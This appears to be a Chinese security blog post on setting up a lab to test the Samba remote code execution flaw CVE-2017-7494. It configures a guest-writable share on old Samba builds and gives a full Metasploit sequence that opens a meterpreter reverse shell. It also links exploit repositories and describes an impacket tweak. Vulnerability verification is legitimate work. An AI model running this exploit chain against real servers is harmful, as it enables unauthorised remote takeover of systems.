搭建漏洞利用测试环境

TL;DR - 快速搭建漏洞利用测试环境,进行漏洞验证。本文以Samba远程代码执行漏洞(CVE-2017-7494)为例
1.Samba CVE-2017-7494 漏洞概述
2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞,漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。
2.环境介绍
攻击者操作系统:
Kali linux 2017.1(kali-rolling)

目标操作系统:
Ubuntu 16.04.2 LTS

漏洞软件包版本:
samba 2:4.3.11+dfsg-0ubuntu0.16.04.6

漏洞软件包下载地址:
https://launchpad.net/~ubuntu-security-proposed/+archive/ubuntu/ppa/+build/12371197
https://github.com/Zer0d0y/Samba-CVE-2017-7494/blob/master/Samba_CVE-2017-7494_pkgs.tar.gz
3.Samba配置
# Samba配置
vi /etc/samba/smb.conf
# 在文件最后添加如下内容
[public]
path = /share
public = yes
writable = yes
guest ok = yes

# 创建目录、设置权限、重启服务
mkdir /share
chown nobody:nogroup /share/
/etc/init.d/smbd restart
4.漏洞利用(metasploit)
msfconsole
use exploit/linux/samba/is_known_pipename
set RHOST 192.168.8.95
show targets
set target 3
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.8.82
set LPORT 51000
show options
exploit
5.安装老版本软件包(Ubuntu 和 CentOS)进行漏洞验证
# Ubuntu
方法一.通过launchpad下载
https://launchpad.net/ubuntu/版本代号/+source/软件包名

举例:Ubuntu 16.04 xenial
https://launchpad.net/ubuntu/xenial/+source/samba
选择相关版本:
https://launchpad.net/ubuntu/+source/samba/2:4.3.11+dfsg-0ubuntu0.16.04.6
选择平台:Builds ---> amd64
https://launchpad.net/~ubuntu-security-proposed/+archive/ubuntu/ppa/+build/12371197
下载所需软件包:
dpkg -l | grep samba | cut -d' ' -f3
wget xxx.deb

# CentOS
方法一.
yum --showduplicates list samba

方法二.
http://vault.centos.org/6.0/os/x86_64/Packages/
http://vault.centos.org/6.0/os/SRPMS/Packages/ or http://ftp.redhat.com/redhat/linux/enterprise/6Server/en/os/SRPMS/
http://rpm.pbone.net/
6.查看软件包修复了哪些Bug(#漏洞)
# Ubuntu
apt changelog samba

# CentOS
rpm -qa samba --changelog | head
yum install yum-plugin-changelog
yum changelog 1 samba | less
7.Samba CVE-2017-7494 on CentOS 6.5
# 安装老版本Samba
yum --showduplicates list samba
yum remove samba-*
yum install samba-3.6.23-41.el6
setenforce 0

# 配置Samba
vi /etc/samba/smb.conf
[global]
workgroup = WORKGROUP
server string = 23 Samba Server Version %v
netbios name = jsamba
log file = /var/log/samba/log.%m

security = share
[public]
path = /share
public = yes
writable = yes
guest ok = yes

mkdir /share
chown nobody:nobody /share -R
/etc/init.d/smb restart
附录:Samba CVE-2017-7494 漏洞利用工具

https://github.com/joxeankoret/CVE-2017-7494
https://github.com/CoreSecurity/impacket/blob/master/examples/sambaPipe.py
https://github.com/opsxcq/exploit-CVE-2017-7494
https://github.com/omri9741/cve-2017-7494

# Notes on CoreSecurity impacket
修改文件impacket/smb3.py
# 行925 注释掉 fileName = string.replace(fileName, '/', '\\')
# 行927 注释掉 fileName = ntpath.normpath(fileName)
comments powered by Disqus

作者:Zer0d0y
微信关注:Zer0d0y
本文出处:https://www.zer0d0y.info/post/notes-on-bug-hunting-labs/
本站评论使用Disqus,如果长时间无法加载,请切换至“自由”互联网。
文章版权归本人所有,欢迎转载,但未经作者同意必须保留此段声明,且在文章页面明显位置给出原文连接,否则保留追究法律责任的权利。